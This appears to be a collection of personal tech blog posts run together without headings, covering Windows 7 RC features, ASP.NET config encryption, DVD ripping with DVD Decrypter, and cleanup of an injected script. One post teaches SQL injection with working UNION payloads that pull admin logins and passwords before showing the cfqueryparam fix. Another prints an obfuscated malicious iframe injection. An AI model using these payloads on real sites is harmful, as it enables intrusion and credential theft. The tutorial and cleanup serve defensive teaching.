All screen shots were taken on a virtual machine running Windows 7 Build 7100 RC.

Desktop:

Microsoft included Bitlocker, a tool used for full drive encryption. This tool makes it very difficult for common exploits to retrieve data through non Windows services or secondary Operating Systems.

Also included is a back-up utility with the ability to back-up to a Network Share.

You can create a full system image or just specific parts. And of course, scheduling.

And like Vista, IIS7 is available for ASP .NET developers

New to me, PowerShell 2.0. The language reminds me of c#, sorta.

http://www.microsoft.com/windowsserver2003/technologies/management/powershell/default.mspx

The RC key doesn’t expire until June 10, 2010 so I don’t see this being finalized until at least 2011. I may upgrade my daily desktop shortly, it uses the about the same resources of XP Pro at idle.

1) You are setting the trust level to medium and using the 1.0.61025.0 version of System.Web.Extensions. Update the trust level to full and and update ALL occurrences of System.Web.Extensions to 3.5.0.0 in the web.config (assuming .NET 3.5 framework is installed).

Original:

<trust level="Medium"...
...
...System.Web.Extensions, Version=1.0.61025.0...

Updated:

<trust level="Full"...
...
...System.Web.Extensions, Version=3.5.0.0...

2) You have a trailing slash in the HTTPAlias field in the PortAlias table, remove it.

That’s it

The first command encrypts; replace domain.com with your site name in IIS and the -app switch should be followed by the application name, in this case the webroot:

C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727>aspnet_regiis -pe connectionStrings -app / -site domain.com
Encrypting configuration section…
Succeeded!

The second and third commands grant read access to the key for decryption. This permission needs to be granted to ASPNET and your application pool identity. The value following the -pa switch can be found in the C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config where the RSAProtectedConfigurationProvider name is defined :

<add name="RsaProtectedConfigurationProvider"......keyContainerName="NetFrameworkConfigurationKey"

C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727>aspnet_regiis -pa “NetFrameworkConfigurationKey” “ASPNET”
Adding ACL for access to the RSA Key container…
Succeeded!

C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727>aspnet_regiis -pa “NetFrameworkConfigurationKey” “NETWORK SERVICE”
Adding ACL for access to the RSA Key container…
Succeeded!

Original:

<connectionStrings> <add name="stringname" connectionString="Data Source=SERVER;Initial Catalog=database;Persist Security Info=True;User ID=login;Password=password" providerName="System.Data.SqlClient" /> </connectionStrings>

Encrypted (partially truncated):

<connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider"> <EncryptedData Type="http://www.w3.org/2001/04/xmlenc#Element" xmlns="http://www.w3.org/2001/04/xmlenc#"> <EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#tripledes-cbc" /> <KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#"> <EncryptedKey xmlns="http://www.w3.org/2001/04/xmlenc#"> <EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#rsa-1_5" /> <KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#"> <KeyName>Rsa Key</KeyName> </KeyInfo> <CipherData> <CipherValue>pb74wqH93ZDjJNrHSkRqBJKxvq4eS4MDq+vF2RvWZSFhXBkgBcS...tWmHYi8=</CipherValue> </CipherData> </EncryptedKey> </KeyInfo> <CipherData> <CipherValue>KY4ESXL95+AtOAu3QRBURO5ij6GKTUDmosRcQ2YzOGtt8mLGs0wJLONl0i1mA...qJioHKV0tOl3Y=</CipherValue> </CipherData> </EncryptedData> </connectionStrings>

That’s it

Haven’t gotten the chance to configure it yet tho

Example:
http://jw0rd.com/test2.cfm?id=1

A basic database driven ColdFusion page that uses the URL parameter ‘id’ in a SQL SELECT statement. This is what the output of the page is supposed to look like:

The coding on this page selects a record from the ‘articles’ table where id = #URL.id#

select * from articles where id = #URL.id#

It then outputs the title, category, and article fields for that row where id = #URL.id#. Like a lot of poorly coded web applications there is no sanitation on the URL parameter ‘id’, so lets alter the SQL statement and add a UNION.

URL encoding – http://www.w3schools.com/TAGS/ref_urlencode.asp
%20 = [space]
%27 = ‘

http://jw0rd.com/test2.cfm?id=1%20union%20select%201,%27%27,login,password%20from%20admin

The full SQL statement is now:
select * from articles union select 1,'',login,password from admin

The output on the page is now two records, one from the articles table and one from the admin table.

Now let’s add a select on @@version to determine the version of SQL the database server is running and also SYSTEM_USER to see if its possibly using a high privileged SQL account such as ’sa’.

http://jw0rd.com/test2.cfm?id=1%20union%20select%201,@@version,SYSTEM_USER,%27%27%20from%20admin%20order%20by%20title

The full SQL statement is now:
select * from articles union select 1,@@version,SYSTEM_USER,'' from admin order by title

Now that you get the idea of how to exploit through SQL injection how do you prevent it? ALL variables that can be POST’d or GET’d from an anonymous user need to be sanitized. For our ColdFusion example above the use of the ‘cfqueryparam’ tag will get the job done -> http://livedocs.adobe.com/coldfusion/8/htmldocs/help.html?content=Tags_p-q_18.html

Original, vulnerable SQL Statement in test2.cfm:

select * from articles where id = #URL.id#

Updated, secure SQL statement:

select * from articles where id = <cfqueryparam value="#URL.id#" CFSQLType = "CF_SQL_INTEGER">

Now that we are forcing that variable to be of type integer lets try to inject a SQL statement again.

SQL injection is no longer possible through the ‘id’ parameter:

Invalid data 1 union select 1,”,login,password from admin for CFSQLTYPE CF_SQL_INTEGER.

Another security risk is the raw ColdFusion error that displays a snippet of our code to an anonymous user. Setting up custom error handling so that is not seen is always a good idea but is an entirely different subject.

Hopefully I will have some extra time soon to post a similar article related to basic MySQL injection techniques.

Software Required:

DVD Decrypter – http://www.dvddecrypter.org.uk/
ImgBurn – http://www.imgburn.com/index.php?act=download

Hardware Required:

Burner that supports DVD+R/-R DL
Blank DVD+R/-R DL media (I only use Verbatim +R)

Once DVD Decrypter is installed, open it and set the appropriate mode, Mode -> ISO -> Read.

Select the source drive, take note that DVD Decrypter recognizes both layers and the break point:

Number of Layers: 2
Track Path: Opposite Track Path (OTP)
Linear Density: 0.293 um/bit
Track Density: 0.74 um/track
First Physical Sector of Data Area: 196,608
Last Physical Sector of Data Area: 16,567,183
Last Physical Sector in Layer 0: 2,225,151

Layer Information:
Layer 0 Sectors: 2,028,544 (50.17%)
Layer 1 Sectors: 2,015,120 (49.83%)

Go to Tools -> Settings -> ISO Read Mode , verify that “create mds file” is checked.

Set the Destination output for your .iso

Click the Decrypt button and the let the .iso build

Once it completes you will see the .iso and .mds in the output directory you specified. The .iso is the actual image data and the .mds is the media descriptor file that contains the layer break info.

At this point you can eject the DVD, you have a full backup copy of it on your hard drive. You can play back from that image file by mounting it with media emulation software such as Daemon Tools. For DVD playback I personally like VLC media player.

Daemon Tools: http://www.disk-tools.com/download/daemon
VLC Media Player: http://www.videolan.org/vlc/

Once you have both installed there’s just a few quick steps to get going.

Enable a device through the Daemon Tools taskbar icon:

Mount your image file (select the .mds or .iso, doesn’t matter):

You should now see an additional device (In this case D:\ is the physical drive that still has the DVD in it, F:\ is the virtual drive that Daemon Tools created with our image mounted)

Open VLC media player, go to Media -> Open Disc and select the virtual drive. Your DVD should now be playing from the image file you created.

So now that we understand how to rip the DVD to an image file and play it back on a virtual drive, how do we burn the image file back to a blank dual layer disc?

Open ImgBurn and go to Mode -> Write.

Select the source .mds file, update the Write Speed to what’s printed on the media, and click the Write icon.

If you don’t get any warning related to layer breaks prior to the burn process starting everything was done properly. That’s it!

.NET 3.5 SP1: http://www.microsoft.com/downloads/details.aspx?FamilyId=AB99342F-5D1A-413D-8319-81DA479AB0D7&displaylang=en

Chart Controls: http://www.microsoft.com/downloads/details.aspx?FamilyID=130f7986-bf49-4fe5-9ca8-910ae6ea442c&displaylang=en

Open Visual Studio and press ctrl+f. “Quick Replace” -> “Replace in Files”.

The injection we want to remove for this example is as follows:

<script><!--
var applstrna0 = "<if";
var applstrna1 = "rame src=http://www.maliciousdomain";
var applstrna2 = ".com/CONTENT/faq.htm";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>


Notice the multiple line breaks and special characters, this is where Visual Studio regular expressions become handy.

http://msdn.microsoft.com/en-us/library/2k3te2cs(VS.80).aspx

For this situation this we need to understand how to use these expressions:

Any character   .     Matches any single character except a line break.
Zero or more     *    Matches zero or more occurrences of the preceding expression, making all possible matches.
Line break        \n   Matches a platform-independent line break. In a Replace expression, inserts a line break.
Escape             \     Matches the character that follows the backslash (\) as a literal. This allows you to find the characters used in regular expression notation, such as { and ^. For example, \^ Searches for the ^ character.

Here is the final search string:

\<script\>\<\!\-\-\n.*\"\<if\"\;\n.*domain\"\;\n.*faq\.htm\"\;\n.*\=0\>\<\/i\"\;\n.*frame\>\"\;\n.*applstrna4\)\;\n.*\<\/script\>

Be sure to select “Use: Regular Expressions” , then “Replace all”. If you’re on an internal network you can just use a UNC path in the “Look in:” input.

Once it completes it will tell you how many occurrences were replaced and it will actually make a log of it in your find results pane window.

Replace all "\<script\>\<\!\-\-\n.*\"\<if\"\;\n.*domain\"\;\n .*faq\.htm\"\;\n.*\=0\>\<\/i\"\;\n.*frame\>\"\;\n.*applstrna4\)\;\n .*\<\/script\>", "", Regular expressions, Find Results 1, "C:\", "*.aspx" C:\Default.aspx(32,1): Total replaced: 1 Matching files: 1 Total files searched: 1

Original:

define(’DB_CHARSET’, ‘utf8′);

Updated:

define(’DB_CHARSET’, ”);

That’s it!